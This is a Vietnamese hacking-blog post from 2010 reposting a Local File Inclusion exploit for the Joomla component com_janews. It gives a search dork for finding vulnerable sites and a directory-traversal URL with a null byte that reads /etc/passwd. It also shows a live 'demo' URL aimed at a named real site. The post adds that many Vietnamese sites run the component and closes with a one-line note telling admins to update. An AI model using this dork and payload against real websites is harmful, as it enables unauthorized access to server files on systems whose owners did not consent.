Trang chủ > Hacker - Xâm Nhập, Kỹ Thuật Xâm Nhập > Joomla Component com_janews

Joomla Component com_janews

Tháng Ba 15, 2010 Để lại phản hồi Go to comments

####################################################################

.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]

.:. Team : Sec Attack Team

.:. Home : www.sec-attack.com/vb

.:. Script : Joomla Component com_janews

.:. Bug Type : Local File Inclusion [LFI]

.:. Dork : inurl:"com_janews"

####################################################################

===[ Exploit ]===

www.site.com/index.php?option=com_janews&controller=[LFI]

www.site.com/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00

####################################################################

Hiện có rất nhiều web ở Việt Nam dùng com này

Demo:

http://www.cynosura.org/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00

Đáng chú ý hơn nữa web www.smot.gov.vn đã bị chèn virus các bạn không nên vào


Admin các web có dùng com này nên update sửa lỗi

Chúng tôi không chịu trách nhiệm về các site đăng trên đầy và lỗi của com này


AlexBTP – Viet Matrix Revolutions


Categories: Hacker - Xâm Nhập, Kỹ Thuật Xâm Nhập Thẻ:
  1. Chưa có phản hồi.
  1. No trackbacks yet.

Gửi phản hồi

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Thay đổi )

Twitter picture

You are commenting using your Twitter account. Log Out / Thay đổi )

Facebook photo

You are commenting using your Facebook account. Log Out / Thay đổi )

Hủy bỏ

Connecting to %s

Follow

Get every new post delivered to your Inbox.